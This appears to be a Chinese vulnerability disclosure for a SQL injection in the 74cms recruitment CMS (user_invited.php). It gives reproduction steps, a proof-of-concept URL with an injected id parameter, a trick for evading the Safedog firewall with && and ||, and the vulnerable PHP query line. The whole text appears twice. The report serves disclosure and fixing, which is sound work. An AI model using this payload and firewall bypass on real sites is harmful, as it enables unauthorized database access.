注册企业账户,填写企业信息,然后发布职位。再访问下面的URL。 http://demo.74cms.com/user/user_invited.php?id=1&act=invited 其中id参数可以注入。 由于有安全狗的原因,and会被拦截,我们用&&和||代替吧. http://demo.74cms.com/user/user_invited.php?id=1%20||%201&act=invited 代码/user/user_invited.php:191: ``` $row = $db->getone("select * from ".table('company_down_resume')." where company_uid={$_SESSION['uid']} and resume_id = {$_GET['id']}"); if(!$row){ //-------------------// if($_SESSION['utype']==1){ if ($_CFG['operation_mode']=="2") { ``` 由于id参数没有过滤直接带入到了数据库查询语句中造成了SQL注入。
注册企业账户,填写企业信息,然后发布职位。再访问下面的URL。 http://demo.74cms.com/user/user_invited.php?id=1&act=invited 其中id参数可以注入。 由于有安全狗的原因,and会被拦截,我们用&&和||代替吧. http://demo.74cms.com/user/user_invited.php?id=1%20||%201&act=invited 代码/user/user_invited.php:191: ``` $row = $db->getone("select * from ".table('company_down_resume')." where company_uid={$_SESSION['uid']} and resume_id = {$_GET['id']}"); if(!$row){ //-------------------// if($_SESSION['utype']==1){ if ($_CFG['operation_mode']=="2") { ``` 由于id参数没有过滤直接带入到了数据库查询语句中造成了SQL注入。